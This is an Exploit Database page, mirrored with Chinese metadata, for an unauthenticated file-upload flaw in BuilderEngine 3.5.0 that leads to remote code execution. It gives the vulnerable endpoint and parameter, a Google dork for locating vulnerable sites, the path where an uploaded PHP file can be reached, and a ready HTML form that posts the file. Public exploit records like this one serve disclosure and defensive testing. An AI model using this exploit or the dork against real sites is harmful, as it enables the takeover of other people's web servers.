BuilderEngine 3.5.0 – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： metanubix
  日期： 2016-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40390/

• <!-- 
  # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
  # Date: 18/09/2016
  # Exploit Author: metanubix
  # Vendor Homepage: http://builderengine.org/
  # Software Link: http://builderengine.org/page-cms-download.html
  # Version: 3.5.0
  # Tested on: Kali Linux 2.0 64 bit
  # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
  
  1) Unauthenticated Unrestricted File Upload:
  
  	POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
  
  	Vulnerable Parameter: files[]
  
  	We can upload test.php and reach the file via the following link:
  	/files/test.php
  -->
  <html>
  <body>
  <form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
  	<input type="file" name="files[]" />
  	<input type="submit" value="send" />
  </form>
  </body>
  </html>